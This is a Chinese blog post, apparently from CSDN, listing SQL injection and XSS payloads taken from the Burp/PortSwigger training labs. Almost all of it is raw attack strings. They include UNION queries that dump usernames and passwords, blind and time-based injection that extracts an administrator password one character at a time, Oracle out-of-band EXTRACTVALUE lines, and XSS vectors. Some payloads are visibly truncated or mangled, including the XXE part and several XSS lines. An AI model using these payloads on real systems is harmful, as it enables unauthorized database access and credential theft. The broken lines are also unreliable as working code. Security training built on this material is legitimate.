• 整理的burp官网的漏洞语句


    一、SQL注入

    where从句
    '+OR+1=1--
    登录绕过
    administrator'--
    union从句
    '+UNION+SELECT+NULL--
    '+UNION+SELECT+NULL,NULL--
    '+UNION+SELECT+'abcdef',NULL,NULL--
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+username,+password+FROM+users--
    '+UNION+SELECT+NULL,'abc'--
    '+UNION+SELECT+NULL,username||'~'||password+FROM+users--
    查询数据库类型
    '+UNION+SELECT+'abc','def'+FROM+dual--
    '+UNION+SELECT+BANNER,+NULL+FROM+v$version--
    '+UNION+SELECT+'abc','def'#
    '+UNION+SELECT+@@version,+NULL#
    列出数据库内容
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
    '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
    '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
    盲注
    TrackingId=xyz' AND '1'='1
    TrackingId=xyz' AND '1'='2
    TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§
    TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

    TrackingId=xyz'
    TrackingId=xyz''
    TrackingId=xyz'||(SELECT '')||'
    TrackingId=xyz'||(SELECT '' FROM dual)||'
    TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||'
    TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    时间盲注
    TrackingId=x'||pg_sleep(10)--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--

    二、xss

    ">

    javascript:alert(document.cookie)

    "οnmοuseοver="alert(1)

    '-alert(1)-'

    product?productId=1&storeId=">

    {{$on.constructor('alert(1)')()}}

    \'-alert(1)//

    ${alert(1)}

  • 相关阅读:
    2022-07-05 stonedb的子查询处理解析
    RK3399_安卓SDK编译报错解决方案整理
    [Git] 系列二高级命令学习记录
    如何正则匹配乱码?
    union all 和 union 的区别,mysql union全连接查询
    java基础的复习
    vue组件之间传参方式
    人脸识别技术,如何解决学校门禁安全?
    UE学习日记14
    字节跳动2021首发485道Java岗面试题(含答案)
  • 原文地址:https://blog.csdn.net/tainqiuer123/article/details/125887065